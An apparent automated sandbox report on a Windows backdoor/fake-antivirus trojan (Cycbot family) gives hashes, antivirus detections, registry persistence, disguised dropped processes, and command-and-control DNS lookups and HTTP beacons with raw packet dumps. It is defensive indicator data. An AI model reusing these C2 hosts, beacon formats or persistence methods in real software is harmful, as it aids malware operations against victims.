Analysis Date2014-06-16 05:32:46
MD5cdf06c09eb4823e1290067d964b425ea
SHA11a36cb5f3aa5efae6bad22f1908e1544a87ffd79

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: f2ff8894d04071d944b47317f140b013 sha1: e595eb782aa5ba014d7dded11ff5f3ba1669ec2b size: 167424
Section.rdata md5: a70a52e480d85e0cf9bc668b7d8239b6 sha1: ee0d73d99f1b186ae65609a2e5ef7cf539bb0826 size: 3072
Section.data md5: 07b8baf2b01eacb93e58fa7a299873df sha1: ea7f128b5ee8a29b0737193769cee6baa7d00610 size: 23040
Section.lib md5: 50136bdb1dfb8f0ff7cf82e7a29ecdc3 sha1: 06ab0c7e7a8991b4a6ec821dc773f2d60d3fddaa size: 512
Timestamp2005-10-13 20:22:44
VersionPrivateBuild: 1113
PEhash7cb38d32436de37884b539d0deb64b0cefc10f72
IMPhash99829bba2ef8e4b4ca5ac154af54dba8
AV360 SafeGen:Trojan.Heur.KS.1
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Kazy.12298.psa
AVAvira (antivir)TR/Kazy.12298.psa
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-121283
AVClamAVWin.Trojan.Agent-121283
AVDr. WebTrojan.DownLoader2.7744
AVDr. WebTrojan.DownLoader2.7744
AVEmsisoftGen:Trojan.Heur.KS.1
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KTW
AVEset (nod32)Win32/Kryptik.KTW
AVFortinetW32/Katusha.O!tr
AVFortinetW32/Katusha.O!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Generic_r.FN
AVGrisoft (avg)Generic_r.FN
AVIkarusBackdoor.Win32.Gbot
AVIkarusBackdoor.Win32.Gbot
AVKasperskyTrojan.Win32.Generic
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Crypt.AUQU
AVNormanwinpe/Crypt.AUQU
AVRisingno_virus
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSrossroadbags.com
Winsock DNSzoneom.com
Winsock DNSzoneak.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSrossroadbags.com
Type: A
50.56.218.189
DNSzonetf.com
Type: A
208.73.211.164
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.236
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.177
DNSzoneom.com
Type: A
50.63.202.40
DNSzoneak.com
Type: A
HTTP GEThttp://rossroadbags.com/images/p_thumb/3520.jpg?tq=gP4aKydNv2NzyPWZ5PYQjnOyuuEspEs6s1vyGgBE3Y4AgKeY3gFo%2Fmaz4s9wSrQForOSrjfxcjp8%2FvoQMsBRnBTvS2QnifLMv%2FRHQn9dHeHw4FdJg71UD%2FhsmUkZ%2FqEXq6gZdyEOeS7j0WkJbVI47pr0bQhPSSjv%2FkiR6NbOLHsdZomalCjG4HaOZxwQEgSbYFA2QAsl0FDnQELDmJuEghVDI%2B5k7c2jbliRFScZDUoICy6NGzQ8c%2BFZRAjUhO6QyMuoCNV0e7CIW6b%2BtIy2VnSaa%2FXnd%2BDpEBPGw3%2F9vD5wzjXgDQ75xljOMC9lWz825Nrw1ZB9d12HD2W7xSUNa%2Bg8PT8X22LA54rw77E7QXhVt7%2FVdYk626ysM48EkPYNrK2Molw%2FwxijZ674xoUIvjBmp6m0IGMo5K1PmesSlNf4v7xsTLMAr%2F0zQhivKiPWKCP%2Bcvg6XxDcXFK3tJzqUY0an1X%2BStIhH4tjyh1Bum0X5iujlpxMR0pjY%2BuoItgQW12FP6TvS0ay9YE4l1wwKb6XKDO2Ur%2FrgBTtdChLrjf0Lw18UzVdnXP8kNguevL7NjsiDDIdi7omLyo5ZsLcQvRdQkMbPBvHGlospDwtdDgOmlG2eo40tqo%2F1Q5CNoR
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zoneom.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUr1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: opera/8.11
Flows TCP192.168.1.1:1031 ➝ 50.56.218.189:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.164:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.164:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.164:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.164:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.164:80
Flows TCP192.168.1.1:1037 ➝ 50.63.202.40:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 705f7468   GET /images/p_th
0x00000010 (00016)   756d622f 33353230 2e6a7067 3f74713d   umb/3520.jpg?tq=
0x00000020 (00032)   67503461 4b79644e 76324e7a 7950575a   gP4aKydNv2NzyPWZ
0x00000030 (00048)   35505951 6a6e4f79 75754573 70457336   5PYQjnOyuuEspEs6
0x00000040 (00064)   73317679 47674245 33593441 674b6559   s1vyGgBE3Y4AgKeY
0x00000050 (00080)   3367466f 2532466d 617a3473 39775372   3gFo%2Fmaz4s9wSr
0x00000060 (00096)   51466f72 4f53726a 6678636a 70382532   QForOSrjfxcjp8%2
0x00000070 (00112)   46766f51 4d734252 6e425476 5332516e   FvoQMsBRnBTvS2Qn
0x00000080 (00128)   69664c4d 76253246 5248516e 39644865   ifLMv%2FRHQn9dHe
0x00000090 (00144)   48773446 644a6737 31554425 32466873   Hw4FdJg71UD%2Fhs
0x000000a0 (00160)   6d556b5a 25324671 45587136 675a6479   mUkZ%2FqEXq6gZdy
0x000000b0 (00176)   454f6553 376a3057 6b4a6256 49343770   EOeS7j0WkJbVI47p
0x000000c0 (00192)   72306251 68505353 6a762532 466b6952   r0bQhPSSjv%2FkiR
0x000000d0 (00208)   364e624f 4c487364 5a6f6d61 6c436a47   6NbOLHsdZomalCjG
0x000000e0 (00224)   3448614f 5a787751 45675362 59464132   4HaOZxwQEgSbYFA2
0x000000f0 (00240)   5141736c 3046446e 51454c44 6d4a7545   QAsl0FDnQELDmJuE
0x00000100 (00256)   67685644 49253242 356b3763 326a626c   ghVDI%2B5k7c2jbl
0x00000110 (00272)   69524653 635a4455 6f494379 364e477a   iRFScZDUoICy6NGz
0x00000120 (00288)   51386325 3242465a 52416a55 684f3651   Q8c%2BFZRAjUhO6Q
0x00000130 (00304)   794d756f 434e5630 65374349 57366225   yMuoCNV0e7CIW6b%
0x00000140 (00320)   32427449 7932566e 53616125 3246586e   2BtIy2VnSaa%2FXn
0x00000150 (00336)   64253242 44704542 50477733 25324639   d%2BDpEBPGw3%2F9
0x00000160 (00352)   76443577 7a6a5867 44513735 786c6a4f   vD5wzjXgDQ75xljO
0x00000170 (00368)   4d43396c 577a3832 354e7277 315a4239   MC9lWz825Nrw1ZB9
0x00000180 (00384)   64313248 44325737 7853554e 61253242   d12HD2W7xSUNa%2B
0x00000190 (00400)   67385054 38583232 4c413534 72773737   g8PT8X22LA54rw77
0x000001a0 (00416)   45375158 68567437 25324656 64596b36   E7QXhVt7%2FVdYk6
0x000001b0 (00432)   32367973 4d343845 6b50594e 724b324d   26ysM48EkPYNrK2M
0x000001c0 (00448)   6f6c7725 32467778 696a5a36 3734786f   olw%2FwxijZ674xo
0x000001d0 (00464)   5549766a 426d7036 6d304947 4d6f354b   UIvjBmp6m0IGMo5K
0x000001e0 (00480)   31506d65 73536c4e 66347637 7873544c   1PmesSlNf4v7xsTL
0x000001f0 (00496)   4d417225 3246307a 51686976 4b695057   MAr%2F0zQhivKiPW
0x00000200 (00512)   4b435025 32426376 67365878 44635846   KCP%2Bcvg6XxDcXF
0x00000210 (00528)   4b33744a 7a715559 30616e31 58253242   K3tJzqUY0an1X%2B
0x00000220 (00544)   53744968 4834746a 79683142 756d3058   StIhH4tjyh1Bum0X
0x00000230 (00560)   3569756a 6c70784d 5230706a 59253242   5iujlpxMR0pjY%2B
0x00000240 (00576)   756f4974 67515731 32465036 54765330   uoItgQW12FP6TvS0
0x00000250 (00592)   61793959 45346c31 77774b62 36584b44   ay9YE4l1wwKb6XKD
0x00000260 (00608)   4f325572 25324672 67425474 6443684c   O2Ur%2FrgBTtdChL
0x00000270 (00624)   726a6630 4c773138 557a5664 6e585038   rjf0Lw18UzVdnXP8
0x00000280 (00640)   6b4e6775 65764c37 4e6a7369 44444964   kNguevL7NjsiDDId
0x00000290 (00656)   69376f6d 4c796f35 5a734c63 51765264   i7omLyo5ZsLcQvRd
0x000002a0 (00672)   516b4d62 50427648 476c6f73 70447774   QkMbPBvHGlospDwt
0x000002b0 (00688)   6444674f 6d6c4732 656f3430 74716f25   dDgOmlG2eo40tqo%
0x000002c0 (00704)   32463151 35434e6f 52204854 54502f31   2F1Q5CNoR HTTP/1
0x000002d0 (00720)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x000002e0 (00736)   636c6f73 650d0a48 6f73743a 20726f73   close..Host: ros
0x000002f0 (00752)   73726f61 64626167 732e636f 6d0d0a41   sroadbags.com..A
0x00000300 (00768)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000310 (00784)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000320 (00800)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a343120   on: close....41 
0x00000150 (00336)   36373462 36353539 20202073 31767947   674b6559   s1vyG
0x00000160 (00352)   67424533 59344167 4b65590a            gBE3Y4AgKeY.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a39 20202073 31767947   ose....9   s1vyG
0x00000160 (00352)   67424533 59344167 4b65590a            gBE3Y4AgKeY.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a202073 31767947   close....  s1vyG
0x00000160 (00352)   67424533 59344167 4b65590a            gBE3Y4AgKeY.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a202073 31767947   ose......  s1vyG
0x00000160 (00352)   67424533 59344167 4b65590a            gBE3Y4AgKeY.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a477733 25324639   close....Gw3%2F9
0x00000160 (00352)   76443577 7a6a5867 44513735 786c6a4f   vD5wzjXgDQ75xljO
0x00000170 (00368)   4d43396c 577a3832 354e7277 315a4239   MC9lWz825Nrw1ZB9
0x00000180 (00384)   64313248 44325737 7853554e 61253242   d12HD2W7xSUNa%2B
0x00000190 (00400)   67385054 38583232 4c413534 72773737   g8PT8X22LA54rw77
0x000001a0 (00416)   45375158 68567437 25324656 64596b36   E7QXhVt7%2FVdYk6
0x000001b0 (00432)   32367973 4d343845 6b50594e 724b324d   26ysM48EkPYNrK2M
0x000001c0 (00448)   6f6c7725 32467778 696a5a36 3734786f   olw%2FwxijZ674xo
0x000001d0 (00464)   5549766a 426d7036 6d304947 4d6f354b   UIvjBmp6m0IGMo5K
0x000001e0 (00480)   31506d65 73536c4e 66347637 7873544c   1PmesSlNf4v7xsTL
0x000001f0 (00496)   4d417225 3246307a 51686976 4b695057   MAr%2F0zQhivKiPW
0x00000200 (00512)   4b435025 32426376 67365878 44635846   KCP%2Bcvg6XxDcXF
0x00000210 (00528)   4b33744a 7a715559 30616e31 58253242   K3tJzqUY0an1X%2B
0x00000220 (00544)   53744968 4834746a 79683142 756d3058   StIhH4tjyh1Bum0X
0x00000230 (00560)   3569756a 6c70784d 5230706a 59253242   5iujlpxMR0pjY%2B
0x00000240 (00576)   756f4974 67515731 32465036 54765330   uoItgQW12FP6TvS0
0x00000250 (00592)   61793959 45346c31 77774b62 36584b44   ay9YE4l1wwKb6XKD
0x00000260 (00608)   4f325572 25324672 67425474 6443684c   O2Ur%2FrgBTtdChL
0x00000270 (00624)   726a6630 4c773138 557a5664 6e585038   rjf0Lw18UzVdnXP8
0x00000280 (00640)   6b4e6775 65764c37 4e6a7369 44444964   kNguevL7NjsiDDId
0x00000290 (00656)   69376f6d 4c796f35 5a734c63 51765264   i7omLyo5ZsLcQvRd
0x000002a0 (00672)   516b4d62 50427648 476c6f73 70447774   QkMbPBvHGlospDwt
0x000002b0 (00688)   6444674f 6d6c4732 656f3430 74716f25   dDgOmlG2eo40tqo%
0x000002c0 (00704)   32463151 35434e6f 52204854 54502f31   2F1Q5CNoR HTTP/1
0x000002d0 (00720)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x000002e0 (00736)   636c6f73 650d0a48 6f73743a 20726f73   close..Host: ros
0x000002f0 (00752)   73726f61 64626167 732e636f 6d0d0a41   sroadbags.com..A
0x00000300 (00768)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000310 (00784)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000320 (00800)   31310d0a 0d0a                         11....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 72312532 426a6277 76675339   fBvUr1%2BjbwvgS9
0x00000040 (00064)   31375736 35724a71 6c4c6667 50695757   17W65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e656f 6d2e636f   .Host: zoneom.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 6f706572   User-Agent: oper
0x000000a0 (00160)   612f382e 31310d0a 0d0a6974 6c653e0a   a/8.11....itle>.
0x000000b0 (00176)   20202020 2020494e 65745369 6d207465         INetSim te
0x000000c0 (00192)   73742070 6167650a 20202020 3c2f7469   st page.    </ti
0x000000d0 (00208)   746c653e 0a20203c 2f686561 643e0a20   tle>.  </head>. 
0x000000e0 (00224)   203c626f 64793e0a 0a202020 203c6833    <body>..    <h3
0x000000f0 (00240)   3e546869 73206973 20746865 20494e65   >This is the INe
0x00000100 (00256)   7453696d 20726561 6c2d6d6f 64652074   tSim real-mode t
0x00000110 (00272)   65737420 70616765 2e2e2e3c 2f68333e   est page...</h3>
